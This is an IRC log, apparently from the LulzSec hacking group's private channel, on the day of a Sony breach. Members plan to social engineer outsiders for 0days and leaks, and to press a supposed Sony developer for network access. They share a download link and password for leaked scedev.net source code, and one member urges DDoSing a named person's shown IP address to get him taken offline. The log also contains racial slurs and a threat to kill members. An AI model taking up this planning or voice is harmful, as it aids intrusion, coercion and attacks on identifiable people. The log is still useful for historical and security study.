Jun 02 16:50:11 <Sabu> save it and pastee.org Jun 02 16:50:18 <Sabu> if they give you code or rars or weird urls Jun 02 16:50:31 <Sabu> grab from vps server no dcc nothing thats risky Jun 02 16:50:34 <Sabu> be smart about shit Jun 02 16:50:41 <Sabu> if any of you get owned I'll lol Jun 02 16:51:45 <Neuron> hehe Jun 02 16:51:57 <Neuron> i don't talk to them the same way i talk here th ats for sure :P Jun 02 16:52:29 <lol> i allways talk in broken english to them because i am "f rom pakistan" Jun 02 16:52:39 <joepie91> lol Jun 02 16:52:55 <lol> you mean i not do good engliush i am learn from book Jun 02 16:53:08 <trollpoll> i talk like that because i cant speak better xDD DDDDD Jun 02 16:54:13 <Sabu> ok who is in there now? Jun 02 16:54:19 <Sabu> kayla you in there? Jun 02 16:54:36 <joepie91> in where? Jun 02 16:54:38 <Sabu> let niggers know to msg you 0day / research / leaks Jun 02 16:54:40 <Sabu> in 2600 chan Jun 02 16:54:42 <joepie91> a Jun 02 16:54:43 <joepie91> ah* Jun 02 16:54:50 <Sabu> you heard kayla?

Jun 02 16:55:12 <trollpoll> i've kicked myself XD Jun 02 16:55:18 <trollpoll> so im not there anymore Jun 02 16:55:21 <lol> another protip even if you are american dont spell it "c olor" use "colour" which is wider used arround the world just saying "color" mea ns you are american Jun 02 16:55:25 <lol> sbau heard what? Jun 02 16:56:15 <Sabu> if you're on 2600 /topic to msg you with 0days or leaks. niggas coming there and giving up lleaks Jun 02 16:56:21 <Sabu> make sure we take advantage of that Jun 02 16:56:25 <Sabu> see what n1ggers got access to Jun 02 16:56:27 <Sabu> that we can use Jun 02 16:57:29 <Neuron> there you go Jun 02 16:58:39 <Neuron> joepie91: i can op you but.... Jun 02 16:58:46 <joepie91> better not Jun 02 16:58:47 <joepie91> I think Jun 02 16:58:53 * lol has quit (A TLS packet with unexpected length was re ceived.) Jun 02 16:58:55 <joepie91> actually Jun 02 16:58:59 <joepie91> let me hop on from a VPS Jun 02 16:59:01 <joepie91> or someshit Jun 02 16:59:05 <joepie91> mm Jun 02 16:59:12 <joepie91> I don't have an unused vps that is not linkable to me Jun 02 16:59:13 <joepie91> >.> Jun 02 16:59:16 <Sabu> how many people are inside the chan? Jun 02 16:59:19 <Sabu> did it grow? Jun 02 16:59:27 * lol (parr0t@HA-g80.qfc.p26q8u.IP) has joined #pure-elite Jun 02 16:59:31 <joepie91> or actually I do Jun 02 16:59:31 <joepie91> maybe Jun 02 17:00:07 <joepie91> goddamn Jun 02 17:00:10 <joepie91> FUCK YOU W2SERVERS Jun 02 17:00:14 * joepie91 raeg Jun 02 17:00:27 <joepie91> changeme:~# uptime Jun 02 17:00:27 <joepie91> 01:00:23 up 2:10, 1 user, load average: 0.10 , 0.03, 0.01 Jun 02 17:00:29 <joepie91> come the fuck on Jun 02 17:00:29 <trollpoll> im there again, im "virtual" Jun 02 17:00:32 <trollpoll> but, dont op me Jun 02 17:00:36 <joepie91> that's the 3rd unannounced reboot Jun 02 17:00:37 <joepie91> in 2 weeks Jun 02 17:01:04 * joepie91 is going to move his irc hub elsewhere Jun 02 17:01:22 <Recursion_> joepie91: I would. Thats bullshit. Jun 02 17:01:31 <joepie91> I've had 4 full days of downtime Jun 02 17:01:33 <joepie91> in the past month Jun 02 17:01:39 <joepie91> the server is massively laggy Jun 02 17:01:44 <joepie91> because it's on a heavily overloaded node Jun 02 17:01:56 <joepie91> and it sometimes is so bad Jun 02 17:01:58 <joepie91> that I have to wait 10 seconds Jun 02 17:02:01 <joepie91> for a response from nickserv Jun 02 17:02:12 <joepie91> even for a $24/yr server that is just BAD Jun 02 17:03:27 <joepie91> <proSI>#Sony has passed the point where it's bet ter to simply scorch the earth and create a new system from scratch. Jun 02 17:03:28 <joepie91> lol Jun 02 17:05:34 * joepie91 should get a Cinfu Jun 02 17:05:50 <Neuron> joepie91: i got a 3 month for $8 so good Jun 02 17:06:09 <joepie91> how good is it? as in responsive? Jun 02 17:06:16 <Neuron> its in germany so a bit of lag Jun 02 17:06:20 <Neuron> but its on a 100mbs line Jun 02 17:06:25 <joepie91> I'm in europe lol Jun 02 17:06:29 <Neuron> so i ping google from it.. 17.2ms

Jun 02 17:06:30 <Neuron> :P Jun 02 17:06:31 <Neuron> so good Jun 02 17:06:35 <joepie91> netherlands, more exactly Jun 02 17:06:35 <joepie91> mm Jun 02 17:06:36 <joepie91> nice Jun 02 17:06:37 <joepie91> but Jun 02 17:06:42 <joepie91> gimme working 2600 ip Jun 02 17:07:09 <joepie91> nvm Jun 02 17:07:16 <joepie91> command prompt decided to start working Jun 02 17:07:17 <joepie91> sort of Jun 02 17:07:57 <Recursion_> upboat, please: http://www.reddit.com/r/technolo gy/comments/hq823/sony_hacked_again_millions_of_usernames_passwords/ Jun 02 17:08:01 <Recursion_> if you have an account. Jun 02 17:08:34 <joepie91> YouAreAPirate = me Jun 02 17:10:03 <joepie91> someone +o me? :D Jun 02 17:10:06 <joepie91> I mean Jun 02 17:10:09 <joepie91> YouAreAPirate Jun 02 17:10:11 <joepie91> not joepie91 Jun 02 17:12:13 <Recursion_> johnmanthorpe John Manthorpe Jun 02 17:12:13 <Recursion_> 50/50 about unvalidated reports that Lulz S has hacked into #Sony Nice trick to gain notoriety. Jun 02 17:12:22 <Recursion_> wtf does that mean? Jun 02 17:13:25 <Neuron> Im captianJack btw Jun 02 17:13:25 <joepie91> Neuron, Topiary, Sabu, anyone else who might hav e +o in #lulzsec Jun 02 17:13:31 <Neuron> joepie91: did it Jun 02 17:13:33 <joepie91> can has +o on YouAreAPirate Jun 02 17:13:34 <joepie91> ag Jun 02 17:13:35 <joepie91> ah* Jun 02 17:13:43 <joepie91> thankies Jun 02 17:14:11 <Recursion_> Mitnick commented on the twitters Jun 02 17:14:18 <Recursion_> lawllawlllawllawllawl Jun 02 17:14:23 <Recursion_> WUR FAMOUZ Jun 02 17:14:55 <Neuron> i just looked at this guys source for "sonydev.n et" Jun 02 17:14:57 <trollpoll> 144 users and growing Jun 02 17:14:59 <Neuron> it seems ligit.. php file etc Jun 02 17:15:07 <Neuron> still investigating in my vm Jun 02 17:15:11 <Recursion_> also the realtime updates on Google are flowing constantly Jun 02 17:15:16 <Recursion_> moreso than the 2pac update Jun 02 17:15:24 <trollpoll> everyone in sec world is commenting right now ab out lulzsec... Jun 02 17:15:44 <Recursion_> yup Jun 02 17:15:44 <Neuron> we are 9k in \o/ Jun 02 17:15:49 <Sabu> if people give you pasteable data pastee.org with encryp tion and password and link here Jun 02 17:15:52 <Recursion_> bitcoin? Jun 02 17:15:56 <Recursion_> Neuron: in what?! Jun 02 17:15:59 <Sabu> if someone links you to urls/codes/etc llink here Jun 02 17:16:11 <Sabu> neuron that source you got pastee.org so we can analyze also Jun 02 17:16:19 <joepie91> Neuron: 9k wat? Jun 02 17:16:40 <kl0ps> congratulations!!! that is so funny :D Jun 02 17:16:59 <kl0ps> u all 13375 :) Jun 02 17:17:01 <Neuron> url: http://www.multiupload.com/726251QMUK Jun 02 17:17:11 <Neuron> pass: 93ght98hq308h5QA$^%Q#$^A#%UYA%YQ Jun 02 17:17:18 <Neuron> kl0ps: your elite also because your part of us : ) Jun 02 17:17:23 <Neuron> joepie91: 9k followers on twitter

Jun 02 17:17:33 <kl0ps> thank :) Jun 02 17:17:33 <joepie91> IT'S OVER 9000 Jun 02 17:17:36 <joepie91> ! Jun 02 17:17:45 <kl0ps> +s Jun 02 17:17:54 <Neuron> supplier = sonic-iso of 2600 Jun 02 17:17:54 <Sabu> 55mb neuron? Jun 02 17:17:56 <Sabu> downloading Jun 02 17:18:06 <Sabu> which site is this for? Jun 02 17:18:08 <Sabu> sonydev.net? Jun 02 17:18:27 <Neuron> aye Jun 02 17:18:44 <Neuron> its a svn pull Jun 02 17:18:50 <Neuron> so technicly you can svn update it Jun 02 17:19:02 <Neuron> im sure we can find the pass somewhere on sony Jun 02 17:19:12 <trollpoll> 15... r we all here? Jun 02 17:20:45 * Sabu gives channel operator status to [redacted] Recursi on_ trollpoll lol Jun 02 17:21:11 <Recursion_> Sabu: kill Recursion Jun 02 17:21:17 <Recursion_> not this account, the other one Jun 02 17:21:19 <Recursion_> obviously/. Jun 02 17:21:27 <Recursion_> its screen session is hanging. Jun 02 17:22:10 * Recursion has quit (Killed (Sabu (le sigh))) Jun 02 17:22:39 <Neuron> omg there actually doing it XD Jun 02 17:22:41 <Neuron> this is fucking epic Jun 02 17:22:50 <Recursion_> <3 Jun 02 17:22:52 <Sabu> doing what? Jun 02 17:23:05 * Recursion_ is now known as Recursion Jun 02 17:23:05 <pwnsauce> are we getting bit coins? Jun 02 17:23:45 <Topiary> 176LRX4WRWD5LWDMbhr94ptb2MW9varCZP Jun 02 17:23:47 <Topiary> not got any here so far Jun 02 17:23:52 <Neuron> singing You are a pirate Jun 02 17:24:18 <joepie91> Topiary Jun 02 17:24:19 <joepie91> http://blockexplorer.com/address/176LRX4WRWD5LWD Mbhr94ptb2MW9varCZP Jun 02 17:25:17 <Sabu> analyzing scedev source codes now Jun 02 17:25:27 <joepie91> my god Jun 02 17:25:29 <joepie91> this VPS is laggy Jun 02 17:25:29 <joepie91> lol Jun 02 17:25:37 <Neuron> rgr Jun 02 17:25:45 <Neuron> joepie91: the german one? Jun 02 17:26:36 <joepie91> noes Jun 02 17:26:37 <joepie91> w2servers Jun 02 17:26:40 <joepie91> the czech one Jun 02 17:27:00 <Neuron> ha Jun 02 17:27:00 <Recursion> seriously guys Jun 02 17:27:05 <Neuron> get the german one trust me Jun 02 17:27:07 <Recursion> watch the live feed on google. Jun 02 17:27:30 <Recursion> its moving with a great speed for this only bein g public for abo0ut an hour Jun 02 17:28:13 <Neuron> Recursion: im on the irc talking to people Jun 02 17:28:21 <Recursion> on 2600? Jun 02 17:29:24 <Recursion> Neuron^ Jun 02 17:30:04 <Neuron> yup Jun 02 17:30:17 <Neuron> Now talking to guy who claims he has a simple wa y to break into mantech.com Jun 02 17:31:08 <trollpoll> ok, now that we are so much ppl here, dont you t hink we need a kind of protocol in case of been caught, something like tell some one (friend, familiy) to enter here an say just a phrase to make the rest know h e were caught... Jun 02 17:31:37 <Recursion> trollpoll: provided everyone keeps shit to thems elves

Jun 02 17:31:42 <Recursion> then nothing will happen Jun 02 17:31:52 <Neuron> just incase if i come in here saying Jun 02 17:32:01 <Neuron> "FUCK FUCK SHIT GUYS FUCK! DELETE YOUR SHIT FUCK !" Jun 02 17:32:03 <Neuron> you know :) Jun 02 17:32:06 <trollpoll> ahahahaha Jun 02 17:32:07 <Recursion> ditto Jun 02 17:32:08 <Recursion> lol Jun 02 17:32:23 <joepie91> lolol Jun 02 17:32:25 <trollpoll> if you were caught you wont be able to enter her e xDDDDDDDD Jun 02 17:32:38 <trollpoll> i know, im always in paranoic mode... Jun 02 17:32:58 <lol> thts how we will know you are caught :D Jun 02 17:33:00 <lol> when you dont come here :D Jun 02 17:33:12 <joepie91> good method to insure yourself Jun 02 17:33:15 <trollpoll> hahaha Jun 02 17:33:19 <joepie91> give one person an archive Jun 02 17:33:21 <joepie91> with instructions Jun 02 17:33:27 <joepie91> on how to get on here and alert people Jun 02 17:33:31 <joepie91> give another person you trust the key Jun 02 17:33:33 <Recursion> ROFL Jun 02 17:33:34 <Recursion> . Jun 02 17:33:34 <Recursion> peruvianidol. RT @GerryDuggan: Sony getting hack ed again is like Biggie Smalls' hearse getting shot up. Jun 02 17:33:36 <joepie91> make them contact each other somehow Jun 02 17:33:39 <joepie91> when you are in trouble Jun 02 17:33:41 <trollpoll> xDDDDDDD Jun 02 17:35:23 <Neuron> who is bottle_of_rum Jun 02 17:37:34 <joepie91> who is voodoo Jun 02 17:37:48 <Neuron> Sabu: whats the word on that source? Jun 02 17:42:19 <storm> hey Jun 02 17:42:26 <storm> i just read the twitter Jun 02 17:42:31 <storm> good lookin' Jun 02 17:42:38 <Sabu> sups Jun 02 17:42:44 <storm> Sabu Jun 02 17:42:54 <storm> you douchenozzle. I txted you. Jun 02 17:43:08 <storm> how did I know it was you: cause no one does a fake ass haddem laugh better than you. Jun 02 17:43:30 <Sabu> EhehahEHUUEAhhahhauehuUHEHAHHeuaheuhUHAeaheaueAHAUHEAE Jun 02 17:43:31 <storm> <3 :> Jun 02 17:43:33 <storm> rofl Jun 02 17:43:57 <Topiary> seriously how the fuck... Jun 02 17:43:58 <storm> HauHauHAUHAUHauHauHAUHAUHauHauHAUHAUHauHauHAUHAU Jun 02 17:44:02 <Topiary> HEuheuheuhUHAhahhaaheuheuhahHAHAHAHEHE Jun 02 17:44:11 <Sabu> storm Jun 02 17:44:15 <storm> yo Jun 02 17:44:16 <Sabu> my brazil character Jun 02 17:44:18 <pwnsauce> hey Jun 02 17:44:20 <Sabu> is based off haddem Jun 02 17:44:21 <Sabu> haahhaha Jun 02 17:44:22 <storm> rofl Jun 02 17:44:31 <storm> u drop then we talk ok? Jun 02 17:44:37 <Sabu> ? Jun 02 17:44:43 <storm> that's what haddem says Jun 02 17:44:51 <Sabu> yeah Jun 02 17:44:51 <storm> I DDOS U U COME BACK THEN WE TALK OK? Jun 02 17:45:17 <storm> btw--#lulzsec is hilarious Jun 02 17:45:24 <Sabu> really? whats going on in there? Jun 02 17:45:31 <storm> it couldn't have worked out any more perfectly Jun 02 17:45:36 <storm> just us being on the servers we ddos

Jun 02 17:45:40 <storm> and them not saying shit Jun 02 17:45:43 <Neuron> yeah haha Jun 02 17:45:46 <Sabu> topiary/neuron - should we just leak the source code for scedev.net / Jun 02 17:45:50 <lol> Sabu: come over :D Jun 02 17:45:51 <Sabu> what did neuron say? Jun 02 17:45:58 <Neuron> some guy is saying he can donate a dual xeon to the cause Jun 02 17:45:59 <Neuron> XD Jun 02 17:46:10 <lol> proberbly to log us tho Jun 02 17:46:24 <storm> lol: we wouldn't use Windows Jun 02 17:46:26 <storm> cakes Jun 02 17:46:32 <storm> :P Jun 02 17:46:43 <Neuron> Sabu: I wouldn't suggest it just yet we could us e more of his shit Jun 02 17:46:57 <Sabu> what else is he offering? Jun 02 17:46:58 <Neuron> hes a sony dev :P Jun 02 17:47:05 <Sabu> you serious Jun 02 17:47:05 <Neuron> if we keep quite we can get more Jun 02 17:47:07 <Sabu> so tell him Jun 02 17:47:13 <Sabu> to give us access into sony network Jun 02 17:47:41 <Neuron> ill see he said he was a ex sony dev but has acc ess Jun 02 17:47:43 <storm> social engineer him into that shit Jun 02 17:47:45 <Sabu> ok Jun 02 17:47:46 <Sabu> so Jun 02 17:47:47 <Sabu> bro Jun 02 17:47:50 <Sabu> what are you doing here talking to us Jun 02 17:47:52 <Sabu> social his ass Jun 02 17:47:53 <Sabu> haha Jun 02 17:47:58 <Neuron> he logged off Jun 02 17:48:02 <Sabu> gay Jun 02 17:48:03 <Neuron> he will be on 2600 Jun 02 17:48:07 <Neuron> idle later so ill talk Jun 02 17:48:08 <Sabu> so he messaged you Jun 02 17:48:10 <Sabu> gave you source Jun 02 17:48:12 <Sabu> llogged off? Jun 02 17:50:05 <trollpoll> wow 228 users Jun 02 17:50:28 <Neuron> yeah he likes us or something Jun 02 17:50:29 <Sabu> I am about to join as brazil Jun 02 17:50:39 <lol> xD biggest chan on 2600 we've fully taken over xD Jun 02 17:51:18 <trollpoll> i've changed my ident, renew my tor address and changed my nick several times... Jun 02 17:51:55 <Sabu> any 2600 admin come on sucking you dicks yet? Jun 02 17:53:13 <Recursion> also, any bitcoin donated? Jun 02 17:54:33 * Neuron has quit (Ping timeout: 121 seconds) Jun 02 17:54:54 <joepie91> http://twitter.com/#!/search/sony Jun 02 17:54:56 <joepie91> oops. Jun 02 17:55:01 <joepie91> :D Jun 02 17:55:33 <trollpoll> i cant imagine the sony admin faces... Jun 02 17:55:45 * Neuron (Neuron@HA-96p.col.tt2aeb.IP) has joined #pure-el ite Jun 02 17:56:56 * Neuron has quit (Quit: leaving) Jun 02 17:58:12 * Neuron (Neuron@HA-c7g.ftg.j06iiv.IP) has joined #pure-el ite Jun 02 17:58:34 * Topiary has quit (Ping timeout: 121 seconds) Jun 02 18:00:07 <Neuron> Need someone to op me Jun 02 18:00:16 <joepie91> [01:58:59] fed so, I want to play wit h you guys and this channel is like, gayer Jun 02 18:00:16 <joepie91> than gay and full of n

ewfags Jun 02 18:00:16 <joepie91> [01:59:11] fed wheres the real #lulzs ec Jun 02 18:00:16 <joepie91> [01:59:18] YouAreAPirate Play in what sense? Jun 02 18:00:16 <joepie91> [01:59:48] fed you now what I mean Jun 02 18:00:16 <joepie91> [01:59:55] egeste know* Jun 02 18:00:18 <Neuron> trollpoll: Topiary Jun 02 18:00:18 <storm> nick? Jun 02 18:00:20 <Neuron> someone op Jun 02 18:00:21 <joepie91> who wants to talk Jun 02 18:00:24 <joepie91> also Jun 02 18:00:24 * pwnsauce gives channel operator status to Neuron Jun 02 18:00:28 <pwnsauce> haOpped Jun 02 18:00:28 <trollpoll> yep Jun 02 18:00:32 <Neuron> CaptianJack Jun 02 18:00:34 <joepie91> ok Jun 02 18:00:45 <trollpoll> i've no op Jun 02 18:00:48 <joepie91> CaptainJack Jun 02 18:00:50 <joepie91> on 2600 Jun 02 18:00:51 <joepie91> is yo Jun 02 18:00:51 <storm> CaptianJack: No such nick/channel Jun 02 18:00:52 <trollpoll> and i dont want it Jun 02 18:00:53 <joepie91> you* Jun 02 18:00:54 <joepie91> right? Jun 02 18:01:20 <Neuron> CaptainJack Jun 02 18:01:23 <Recursion> it took just about 1 hours to hit AP Jun 02 18:01:32 <storm> we have like Jun 02 18:01:33 <storm> dude Jun 02 18:01:35 <Recursion> hour, rather. Jun 02 18:01:36 <storm> more ppl in one room Jun 02 18:01:41 <storm> than this whole server had Jun 02 18:01:42 <storm> has* Jun 02 18:02:01 <joepie91> Neuron Jun 02 18:02:04 <joepie91> his name is egest Jun 02 18:02:06 <joepie91> egeste* Jun 02 18:02:09 <joepie91> he says you are not responding Jun 02 18:02:20 <joepie91> [02:00:21] egeste I know you guys don't know me, but you probably know people that do Jun 02 18:02:20 <joepie91> [02:00:46] egeste Xero, venuism, e, insi dious, nigg, etc etc Jun 02 18:02:20 <joepie91> [02:00:57] egeste kayla Jun 02 18:02:40 <trollpoll> these nicks are very well known Jun 02 18:02:52 <Neuron> haha Jun 02 18:03:10 <Sabu> hes just name dropping Jun 02 18:03:11 <Neuron> tell him to provide a 0day as proff and he can j oin Jun 02 18:03:12 <Neuron> then ban him Jun 02 18:03:17 <Sabu> kayla says that kid used to idle in gnosis Jun 02 18:03:19 <Sabu> and not do shit Jun 02 18:03:38 <joepie91> you talk to him Jun 02 18:03:39 <joepie91> lol Jun 02 18:03:41 <Sabu> guys get your social engineering games up Jun 02 18:03:44 <Sabu> cause im starting to see some fails Jun 02 18:04:03 <Sabu> is topiary on irc? Jun 02 18:04:07 <Sabu> fuck Jun 02 18:04:09 <joepie91> also, yes, I am talking differently on my altern ate nick. Jun 02 18:04:59 <Recursion> Sabu: I'm not even saying a word, bud. Jun 02 18:05:03 <Recursion> just observing. Jun 02 18:05:22 <storm> wow

Jun 02 18:05:23 <storm> bro Jun 02 18:05:28 <Neuron> ? Jun 02 18:05:29 <storm> people are trying to down our ops Jun 02 18:05:35 <joepie91> ? Jun 02 18:05:36 <Neuron> ya think :P Jun 02 18:05:38 <storm> i just put my v6 client up Jun 02 18:05:44 <storm> v00d00 Jun 02 18:06:02 <Sabu> 13:56:30.729325 IP smpp.uk.access.vodafone.net > vps5890 .lulz.net: ICMP echo request, id 30064, seq 4, length 64 Jun 02 18:06:02 <Sabu> 13:56:30.729360 IP vps5890.lulz.net > smpp.uk.access.vod afone.net: ICMP echo reply, id 30064, seq 4, length 64 Jun 02 18:06:03 <Recursion> inbeforebotnetjoins Jun 02 18:06:07 <Sabu> someone from vodaphones pinging us Jun 02 18:06:14 <joepie91> lol Jun 02 18:06:15 <Sabu> 13:56:50.228857 IP 64-46-16-105.dyn.novuscom.net.isakmp > vps5890.lulz.net.isakmp: isakmp: phase 1 I #243 Jun 02 18:06:15 <Sabu> 13:56:50.228886 IP vps5890.lulz.net > 64-46-16-105.dyn.n ovuscom.net: ICMP vps5890.lulz.net udp port isakmp unreachable, length 376 Jun 02 18:06:20 <Sabu> people scanning us Jun 02 18:06:22 <Sabu> lol Jun 02 18:06:23 <Neuron> yeah im getting hit Jun 02 18:06:26 <Sabu> im watcinhg tcpdump hard Jun 02 18:06:27 <Neuron> scan my vm? Jun 02 18:06:32 <joepie91> I am not getting hit it seems Jun 02 18:06:33 <joepie91> odd Jun 02 18:06:33 <trollpoll> in other way of things, do you really think that tor is compromised? i mean, i know that many tor servers are CIA servers, but t his doesnt mean nothing... except a mitm... but they had to know who is gonna c onnect before connect... or do a mitm to everyone... Jun 02 18:06:33 <storm> no scanning Jun 02 18:06:39 <storm> open up tcpdump Jun 02 18:06:41 <storm> and do Jun 02 18:06:43 <storm> -i eth0 Jun 02 18:06:50 <joepie91> or maybe I am. Jun 02 18:06:56 <Sabu> tor is not trustable Jun 02 18:07:05 <Sabu> please dont use for anything other than random site visi tng Jun 02 18:07:07 <joepie91> is it bad my host is so shitty I can't tell whet her I am getting hit? :/ Jun 02 18:07:09 <trollpoll> just because the rsa affair? Jun 02 18:07:12 <Recursion> we gotta get off that server. Jun 02 18:07:18 <Neuron> were getting hit Jun 02 18:07:24 <Recursion> the IRC server Jun 02 18:07:25 <Sabu> neuron Jun 02 18:07:27 <Sabu> so sign off? Jun 02 18:07:29 <Sabu> look Jun 02 18:07:31 <storm> Sabu Jun 02 18:07:31 <Sabu> guys Jun 02 18:07:34 <Neuron> lol i just hopped onto another ip Jun 02 18:07:35 <Sabu> neuron Jun 02 18:07:37 * Topiary (t@HA-s05.rkn.75e5ku.IP) has joined #pure-elite Jun 02 18:07:39 <storm> I use tor to connect to my ddos boxen Jun 02 18:07:40 <Sabu> recursion etc Jun 02 18:07:40 <storm> ;x Jun 02 18:07:46 <Recursion> yup yup Jun 02 18:08:06 <Sabu> if youre going to be in there its for research purposes Jun 02 18:08:13 <joepie91> not getting hit here :/ Jun 02 18:09:04 <trollpoll> Sabu, im using tor right now... Jun 02 18:09:04 <joepie91> ohey Jun 02 18:09:08 <joepie91> Ryan is on 2600

Jun 02 18:09:09 <storm> te whole room is hit Jun 02 18:09:13 <storm> the* Jun 02 18:09:17 <storm> hes hitting random ppl Jun 02 18:09:22 <joepie91> ~b@vps.anon.su Jun 02 18:09:23 <joepie91> [02:07:22] xxxx hi kayla or sabu or tf low Jun 02 18:09:25 <joepie91> ^ Ryan Jun 02 18:09:28 <Neuron> lul Jun 02 18:09:30 <Recursion> I'm out of there Jun 02 18:09:40 <storm> why? Jun 02 18:09:41 <storm> lol Jun 02 18:09:44 <storm> it's funny Jun 02 18:09:44 <storm> xD Jun 02 18:09:51 <storm> set up ipv6 Jun 02 18:09:51 <joepie91> what should I say to Ryan? Jun 02 18:09:56 <storm> they obviously cant hit it Jun 02 18:09:56 <Topiary> <Laurelai> nicely done Jun 02 18:10:01 <storm> 22:09 <xxxx> hi kayla or sabu Jun 02 18:10:06 <storm> he pmed me Jun 02 18:10:07 <storm> rofl Jun 02 18:10:08 <Neuron> lul Jun 02 18:10:13 <Neuron> same Jun 02 18:10:14 <Topiary> [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:10:18 <joepie91> lol Jun 02 18:10:18 <Topiary> Laurelai leaked our logs Jun 02 18:10:19 <Neuron> gonna say im awinee Jun 02 18:10:19 <Topiary> storm Jun 02 18:10:38 <joepie91> uh Jun 02 18:10:40 <joepie91> Topiary Jun 02 18:10:40 <joepie91> .. Jun 02 18:10:43 <joepie91> that is a Frantech IP Jun 02 18:10:48 <Topiary> FIREFIREFIREFIRE Jun 02 18:10:52 <Topiary> FUCK YOU FRANTECH\111 Jun 02 18:10:52 <joepie91> DDoS it Jun 02 18:10:54 <Sabu> everybody stfu Jun 02 18:10:54 <joepie91> it will disappear Jun 02 18:10:55 <storm> ? Jun 02 18:10:56 <joepie91> in a few minutes Jun 02 18:10:56 <Sabu> EVERYONE Jun 02 18:10:57 <Sabu> STFU Jun 02 18:11:02 <Sabu> relax Jun 02 18:11:06 <Sabu> as for ryan Jun 02 18:11:13 <Sabu> ignore him Jun 02 18:11:16 <Sabu> he doesnt know its us Jun 02 18:11:18 <Sabu> jesus Jun 02 18:11:27 <joepie91> relax :P Jun 02 18:11:30 <trollpoll> i left 2600... Jun 02 18:11:36 <Topiary> Ryan huh? Jun 02 18:11:36 <Sabu> ok. Jun 02 18:11:39 <storm> you guys are ridiculous xD Jun 02 18:11:43 <trollpoll> the situation is getting horrible stressing Jun 02 18:11:43 <Sabu> I know jesus Jun 02 18:11:46 <Sabu> look Jun 02 18:11:49 <Sabu> from now on Jun 02 18:12:05 <Sabu> no one goes on 2600 unless you prep yourselfl for the so cial engineering Jun 02 18:12:11 <Sabu> if you dont know how to social engineer do not get on 26 00 Jun 02 18:12:17 <Sabu> if you do not have a ddos protected ip Jun 02 18:12:20 <Sabu> do not get on 2600

Jun 02 18:12:23 <Sabu> thats it Jun 02 18:12:28 <storm> ^ Jun 02 18:12:29 <Neuron> Aye Jun 02 18:12:30 <storm> exactly it Jun 02 18:12:32 <storm> and Jun 02 18:12:34 <storm> for starters Jun 02 18:12:35 <joepie91> it's not ddos protected, but disposable neverthe less :P Jun 02 18:12:40 <storm> ill give anyone an ipv6 shell Jun 02 18:12:42 <storm> straight up Jun 02 18:12:42 <Recursion> aye-aye, storm Jun 02 18:12:46 <storm> cause i love you guys Jun 02 18:12:46 <Recursion> err Jun 02 18:12:47 <storm> :D Jun 02 18:12:47 <Recursion> Sabu: Jun 02 18:12:51 <trollpoll> hahaha Jun 02 18:12:54 <Sabu> yes Jun 02 18:13:07 <Recursion> I meant to say, aye-aye Sabu , not storm Jun 02 18:13:09 <Recursion> muhbad. Jun 02 18:13:11 <Sabu> ok Jun 02 18:13:11 <storm> lol. Jun 02 18:13:18 <Sabu> sony was leaked Jun 02 18:13:22 <Sabu> we got bigger projects Jun 02 18:13:37 <Sabu> atm neuron has access to source code to scedev.net socny dev team Jun 02 18:13:38 * Palladium (Palladium@HA-kd2.1lr.tbgr2g.IP) has joined #p ure-elite Jun 02 18:13:41 <Sabu> how about those who are not busy Jun 02 18:13:42 <joepie91> Topiary: just a tip, Frantech has an automated n ullrouting system in place. If you DDoS Laurelais IP, he will disappear from the internet for a while, and if you keep doing it he will be booted from their ser vice. Jun 02 18:13:49 <Sabu> work on auditing that src Jun 02 18:14:02 <Topiary> I'm off to bed in a few Jun 02 18:14:04 <Sabu> storm, hear that? Jun 02 18:14:08 <Sabu> drop that ip Jun 02 18:14:08 <storm> sup? Jun 02 18:14:10 <Neuron> Im on it currently talking to more people Jun 02 18:14:15 <Sabu> <Topiary> [Laurelai] (~Laurelai@205.185.113.6): Laurela Jun 02 18:14:20 <storm> ok gimme a few Jun 02 18:14:22 <storm> rebooting Jun 02 18:14:22 <Sabu> kk Jun 02 18:14:24 <Sabu> now Jun 02 18:14:25 <Topiary> Laurelai was the one who compromised our HBGay l ogs Jun 02 18:14:29 <Topiary> so yes Jun 02 18:14:29 <storm> im on doze Jun 02 18:14:31 <joepie91> it'll get nullrouted for ~1 hour at first I beli eve Jun 02 18:14:36 <joepie91> after a few nullroutes he will get suspended Jun 02 18:14:37 <joepie91> :) Jun 02 18:14:44 <storm> rebooting now Jun 02 18:15:32 <Palladium> Hi everyone! Jun 02 18:15:46 <Neuron> 0-0 o/ Jun 02 18:16:00 <Neuron> HI! who are you and whats your posion? Jun 02 18:16:46 <Neuron> For funzies Topiary: we have a IAMA request on r eddit if your intrested Jun 02 18:16:58 <joepie91> - CrazyD quit (Quit: Sure is #ifeds) Jun 02 18:17:00 <joepie91> lolwut Jun 02 18:17:08 <Topiary> what's that?

Jun 02 18:17:19 <Topiary> @ Neuron Jun 02 18:17:24 <Neuron> a IAMA Jun 02 18:17:31 <Neuron> basically a Qand A session on reddit Jun 02 18:17:39 <Neuron> were redditors ask questions an you answer Jun 02 18:18:00 <Sabu> wait Jun 02 18:18:06 <Sabu> you guys started a iama on reddit? Jun 02 18:18:49 <Recursion> ... Jun 02 18:19:00 <Sabu> I will go to your homes and kill you. Jun 02 18:19:10 <storm> yo Jun 02 18:19:13 <Recursion> Neuron: are you serious? Jun 02 18:19:17 <Sabu> if you really started an iama bro Jun 02 18:19:24 <Sabu> you really dont understand what we are about here Jun 02 18:19:51 <kl0ps> ok guys, i have to go to bed. see you tomorrow. btw lulz sec is so funny :D ... love ya Jun 02 18:19:54 <kl0ps> gn8 Jun 02 18:20:03 <storm> night Jun 02 18:20:06 <Sabu> goodnight kl0ps Jun 02 18:20:06 <Recursion> g'night Jun 02 18:20:14 <Recursion> Neuron Jun 02 18:20:15 * kl0ps has quit (Quit: Leaving) Jun 02 18:20:17 <Recursion> ffs Jun 02 18:20:50 <Sabu> I dont see it Jun 02 18:21:08 <trollpoll> Sabu, mmm, what do you think about doing some "t utorials" on how to act, how to protect ourselves, etc... Jun 02 18:21:16 <trollpoll> something quick and dirty Jun 02 18:21:43 <Sabu> I think so Jun 02 18:21:44 <Topiary> let's not do a Q&A with Reddit Jun 02 18:21:57 <Sabu> I thought all this stuff was common knowledge Jun 02 18:22:04 <Recursion> we shouldn't interface with the public any more than we have to Jun 02 18:22:12 <Topiary> twitter is enough Jun 02 18:22:21 <Topiary> our formspring was dumb so I stopped answering q uestions weeks ago Jun 02 18:22:23 <Recursion> indeed. Jun 02 18:22:32 <storm> Sabu Jun 02 18:22:40 <storm> I have to leave can you keep that IP for later? Jun 02 18:22:42 * Sabu has changed the topic to: pE NO LEAKS NO MEDIA Talk to Sabu OR Topiary if unsure. Jun 02 18:22:48 <Sabu> yup save it for later Jun 02 18:22:51 